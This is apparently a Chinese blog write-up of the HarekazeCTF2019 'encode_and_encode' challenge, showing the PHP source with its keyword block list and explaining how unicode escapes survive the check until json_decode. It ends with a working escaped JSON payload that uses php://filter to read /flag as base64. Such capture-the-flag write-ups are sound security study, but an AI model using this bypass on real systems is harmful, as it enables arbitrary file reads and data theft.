[HarekazeCTF2019]encode_and_encode

[HarekazeCTF2019]encode_and_encode

关于php://input的测试

<?php
$a = file_get_contents("php://input");
echo $a;
$b = json_decode($a);
print_r($b);   

在这里插入图片描述

解题过程

打开容器,点击第三个超链接,得到源码

query.php源码

<?php
error_reporting(0);

if (isset($_GET['source'])) {
  show_source(__FILE__);
  exit();
}

function is_valid($str) {
  $banword = [
    // no path traversal
    '\.\.',
    // no stream wrapper
    '(php|file|glob|data|tp|zip|zlib|phar):',
    // no data exfiltration
    'flag'
  ];
  $regexp = '/' . implode('|', $banword) . '/i';
  if (preg_match($regexp, $str)) {
      //发现黑名单,就返回false
    return false;
  }
  return true;
}

$body = file_get_contents('php://input');
$json = json_decode($body, true);//关键的地方

if (is_valid($body) && isset($json) && isset($json['page'])) {
    //第一个is_valid(),对我们post传入的$body进行检查,这个时候关键字符都是unicode编码格式/uxxxx,所以返回true
  $page = $json['page'];
  $content = file_get_contents($page);
    //这时不能让$content中出现黑名单词汇,所以使用php://filter读取flag的base64格式
  if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }
} else {
  $content = '<p>invalid request</p>';
}

// no data exfiltration!!!
$content = preg_replace('/HarekazeCTF\{.+\}/i', 'HarekazeCTF{&lt;censored&gt;}', $content);
echo json_encode(['content' => $content]);

意思很明白,我们要使用post方式传入格式为{"page":"xxxx"}的内容,然后page的值传到了$content里面,然后需要绕过

 if (!$content || !is_valid($content)) {
    $content = "<p>not found</p>\n";
  }

不然$content的值就会被替换,然后需要绕过preg_match(),不然值也会被替换,没想到怎么绕过这个东西,去找找大佬们的wp,肯定有各种奇淫巧技

发现这个题目的关键地方是json_decode会将\uxxx进行转义,这样就可以绕过is_valid的检测

在这里插入图片描述

本地测试

<?php
//\u0070\u0068\u0070是php的unicode编码
$body = '{"page":"\u0070\u0068\u0070"}';

echo $body;
$json = json_decode($body,true);
echo "\n";
var_dump($json);

测试结果

在这里插入图片描述

所以最终的payload配合上php://filter就可以得到flag

{"page":"\u0070\u0068\u0070\u003A\u002F\u002F\u0066\u0069\u006C\u0074\u0065\u0072\u002F\u0063\u006F\u006E\u0076\u0065\u0072\u0074\u002E\u0062\u0061\u0073\u0065\u0036\u0034\u002D\u0065\u006E\u0063\u006F\u0064\u0065\u002F\u0072\u0065\u0073\u006F\u0075\u0072\u0063\u0065\u003D\u002F\u0066\u006C\u0061\u0067"}

在这里插入图片描述

base64解码即可得到flag

参考链接

  1. [HarekazeCTF2019]encode_and_encode | 信安小蚂蚁 (gitee.io)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值